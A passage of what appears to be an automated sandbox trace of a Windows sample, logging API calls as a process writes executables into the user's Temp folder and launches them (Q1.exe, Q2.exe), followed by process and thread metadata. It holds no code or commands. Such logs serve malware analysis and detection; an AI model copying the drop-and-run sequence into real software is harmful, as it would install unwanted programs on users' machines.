lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.187] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.187] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.187] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.188] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.188] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.188] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.188] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.188] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.189] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.189] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.189] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.189] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.189] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.189] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.190] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.190] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.190] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.190] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.190] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.190] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.191] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.191] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.191] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.191] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0xf15, lpNumberOfBytesWritten=0xefdaf8, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefdaf8*=0xf15, lpOverlapped=0x0) returned 1 [0052.192] CloseHandle (hObject=0x3f8) returned 1 [0052.210] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0052.210] SetErrorMode (uMode=0x1) returned 0x0 [0052.211] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q0.exe"), fInfoLevelId=0x0, lpFileInformation=0xefdaf0 | out: lpFileInformation=0xefdaf0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.211] SetErrorMode (uMode=0x0) returned 0x1 [0052.211] LocalAlloc (uFlags=0x0, uBytes=0x56) returned 0x10cb440 [0052.211] RtlMoveMemory (in: Destination=0x10cb440, Source=0x2f1aee8, Length=0x56 | out: Destination=0x10cb440) [0052.211] ShellExecuteExW (in: pExecInfo=0x2f1b0e0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\Q1.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2f1b0e0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\Q1.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x5a4)) returned 1 [0053.393] LocalFree (hMem=0x10cb440) returned 0x0 [0053.465] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", nBufferLength=0x105, lpBuffer=0xefd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", lpFilePart=0x0) returned 0x29 [0053.465] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", nBufferLength=0x105, lpBuffer=0xefd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", lpFilePart=0x0) returned 0x29 [0053.465] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", nBufferLength=0x105, lpBuffer=0xefd770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", lpFilePart=0x0) returned 0x29 [0053.465] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", nBufferLength=0x105, lpBuffer=0xefd620, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", lpFilePart=0x0) returned 0x29 [0053.465] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", nBufferLength=0x105, lpBuffer=0xefd740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", lpFilePart=0x0) returned 0x29 [0053.465] SetErrorMode (uMode=0x1) returned 0x0 [0053.465] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q2.exe"), fInfoLevelId=0x0, lpFileInformation=0xefd950 | out: lpFileInformation=0xefd950*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.465] SetErrorMode (uMode=0x0) returned 0x1 [0053.465] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", nBufferLength=0x105, lpBuffer=0xefd320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe", lpFilePart=0x0) returned 0x29 [0053.466] SetErrorMode (uMode=0x1) returned 0x0 [0053.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q2.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4ec [0053.466] GetFileType (hFile=0x4ec) returned 0x1 [0053.466] SetErrorMode (uMode=0x0) returned 0x1 [0053.466] GetFileType (hFile=0x4ec) returned 0x1 [0053.467] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0053.468] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0053.468] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0053.468] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0053.468] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0053.469] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0053.469] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0053.469] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0053.469] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0053.469] WriteFile (in: hFile=0x4ec, lpBuffer=0x2f1d360*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0xefdaf8, lpOverlapped=0x0 | out: lpBuffer=0x2f1d360*, lpNumberOfBytesWritten=0xefdaf8*=0xa00, lpOverlapped=0x0) returned 1 [0053.470] CloseHandle (hObject=0x4ec) returned 1 [0053.471] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0053.472] SetErrorMode (uMode=0x1) returned 0x0 [0053.472] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q0.exe"), fInfoLevelId=0x0, lpFileInformation=0xefdaf0 | out: lpFileInformation=0xefdaf0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.472] SetErrorMode (uMode=0x0) returned 0x1 [0053.472] LocalAlloc (uFlags=0x0, uBytes=0x56) returned 0x1dcbb1e0 [0053.472] RtlMoveMemory (in: Destination=0x1dcbb1e0, Source=0x2f1e678, Length=0x56 | out: Destination=0x1dcbb1e0) [0053.472] ShellExecuteExW (in: pExecInfo=0x2f1e870*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\Q2.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2f1e870*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\Q2.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x5b4)) returned 1 [0053.656] LocalFree (hMem=0x1dcbb1e0) returned 0x0 [0053.660] SendMessageW (hWnd=0x60150, Msg=0x10, wParam=0x0, lParam=0x0) returned 0x0 [0053.741] GetWindowThreadProcessId (in: hWnd=0x302c0, lpdwProcessId=0xefd360 | out: lpdwProcessId=0xefd360) returned 0x13fc [0053.741] GetCurrentThreadId () returned 0x13fc [0053.741] IsWindow (hWnd=0x302c0) returned 1 [0053.741] KillTimer (hWnd=0x302c0, uIDEvent=0x2) returned 1 [0053.742] DestroyWindow (hWnd=0x302c0) returned 1 [0053.742] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x302c0, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0053.742] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x302c0, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0053.742] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x302c0, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0053.752] DestroyCursor (hCursor=0x60229) returned 1 [0053.754] GetWindowLongPtrW (hWnd=0x60150, nIndex=-20) returned 0x50000 [0053.754] DestroyWindow (hWnd=0x60150) returned 1 [0053.754] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0053.760] PostThreadMessageW (idThread=0x13fc, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0053.761] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0053.763] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0053.783] OleInitialize (pvReserved=0x0) returned 0x0 [0053.784] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0xefe850 | out: lplpMessageFilter=0xefe850*=0x0) returned 0x0 [0053.786] PeekMessageW (in: lpMsg=0xefe750, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0xefe750) returned 1 [0053.788] GetMessageA (in: lpMsg=0xefe750, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xefe750) returned 0 [0053.789] GetCurrentThreadId () returned 0x13fc [0053.791] EnumThreadWindows (dwThreadId=0x13fc, lpfn=0x12207ac, lParam=0x0) returned 1 [0053.880] IsWindowVisible (hWnd=0x90048) returned 0 [0053.880] IsWindowVisible (hWnd=0x7006c) returned 0 [0053.882] GetCurrentThreadId () returned 0x13fc [0053.883] GetCurrentThreadId () returned 0x13fc [0053.883] EnumThreadWindows (dwThreadId=0x13fc, lpfn=0x12207fc, lParam=0x0) returned 1 [0053.884] IsWindowVisible (hWnd=0x90048) returned 0 [0053.884] IsWindowVisible (hWnd=0x7006c) returned 0 [0053.884] OleUninitialize () [0053.885] CloseHandle (hObject=0x28c) returned 1 [0053.885] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1001fac600000001) returned 1 [0053.886] CoGetContextToken (in: pToken=0xeffae0 | out: pToken=0xeffae0) returned 0x0 [0053.886] CObjectContext::QueryInterface () returned 0x0 [0053.886] CObjectContext::GetCurrentThreadType () returned 0x0 [0053.886] Release () returned 0x3 [0053.888] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x10160b0*=0x134, lpdwindex=0xeff820 | out: lpdwindex=0xeff820) returned 0x0 Thread: id = 2 os_tid = 0x111c Thread: id = 3 os_tid = 0x1150 Thread: id = 4 os_tid = 0xe90 [0043.455] CoGetContextToken (in: pToken=0x1b79f000 | out: pToken=0x1b79f000) returned 0x800401f0 [0043.455] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0053.981] SetWindowLongPtrW (hWnd=0x502b0, nIndex=-4, dwNewLong=0x7ffc38b05090) returned 0x1220a5c [0053.986] SetClassLongPtrW (hWnd=0x502b0, nIndex=-24, dwNewLong=0x7ffc38b05090) returned 0x1220a0c [0053.987] PostMessageW (hWnd=0x502b0, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0053.987] GetModuleHandleW (lpModuleName=0x0) returned 0xb70000 [0053.988] UnregisterClassW (lpClassName="WindowsForms10.Window.0.app.0.378734a", hInstance=0xb70000) returned 1 [0053.988] GetModuleHandleW (lpModuleName=0x0) returned 0xb70000 [0053.988] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.378734a", hInstance=0xb70000) returned 0 [0053.989] DeleteAtom (nAtom=0xc000) returned 0x0 [0053.989] FindAtomW (lpString="GDI+Atom_5112_1") returned 0x0 [0053.990] IsWindow (hWnd=0x90048) returned 1 [0053.991] GetModuleHandleW (lpModuleName="user32.dll") returned 0x7ffc38450000 [0053.992] CoTaskMemAlloc (cb=0x10) returned 0x10f1b40 [0053.992] GetProcAddress (hModule=0x7ffc38450000, lpProcName="DefWindowProcW") returned 0x7ffc38b05090 [0053.992] CoTaskMemFree (pv=0x10f1b40) [0053.994] SetWindowLongPtrW (hWnd=0x90048, nIndex=-4, dwNewLong=0x7ffc38b05090) returned 0x122075c [0053.995] SetClassLongPtrW (hWnd=0x90048, nIndex=-24, dwNewLong=0x7ffc38b05090) returned 0x122075c [0053.995] IsWindow (hWnd=0x90048) returned 1 [0053.996] DestroyWindow (hWnd=0x90048) returned 0 [0053.996] PostMessageW (hWnd=0x90048, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0053.996] SetConsoleCtrlHandler (HandlerRoutine=0x1220bdc, Add=0) returned 1 [0054.004] DeleteObject (ho=0x760a0542) returned 1 [0054.006] FindAtomW (lpString="GDI+Atom_5112_1") returned 0x0 [0054.006] DestroyCursor (hCursor=0xa0225) returned 1 [0054.006] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0054.007] CloseHandle (hObject=0x294) returned 1 [0054.007] UnmapViewOfFile (lpBaseAddress=0x1b7e0000) returned 1 [0054.007] CloseHandle (hObject=0x5b4) returned 1 [0054.007] CloseHandle (hObject=0x5a4) returned 1 [0054.008] CloseHandle (hObject=0x288) returned 1 Thread: id = 5 os_tid = 0x508 Thread: id = 6 os_tid = 0xa38 Thread: id = 7 os_tid = 0xd60 Thread: id = 8 os_tid = 0xd64 Thread: id = 9 os_tid = 0x8d4 Thread: id = 10 os_tid = 0xd3c Thread: id = 11 os_tid = 0x790 Thread: id = 12 os_tid = 0xd8c Thread: id = 13 os_tid = 0xa34 Thread: id = 29 os_tid = 0xb38 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4ef15000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f253" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 14 os_tid = 0x988 Thread: id = 15 os_tid = 0x820 Thread: id = 16 os_tid = 0x734 Thread: id = 17 os_tid = 0x6e8 Thread: id = 18 os_tid = 0x76c Thread: id = 19 os_tid = 0x690 Thread: id = 20 os_tid = 0x680 Thread: id = 21 os_tid = 0x614 Thread: id = 22 os_tid = 0x610 Thread: id = 23 os_tid = 0x60c Thread: id = 24 os_tid = 0x5b4 Process: id = "3" image_name = "q1.exe" filename = "c:\\users\\fd1hvy\\appdata\\local\\temp\\q1.exe" page_root = "0x5ae4d000" os_pid = "0x19c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13f8" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0x25c [0055.265] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0055.560] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fe020, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0055.566] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fdf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0055.569] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x6fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0055.574] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x6fe060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0055.574] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x6fdf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0055.587] GetVersionExW (in: lpVersionInformation=0x6fdfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x6fdfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0055.589] GetVersionExW (in: lpVersionInformation=0x6fdfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, 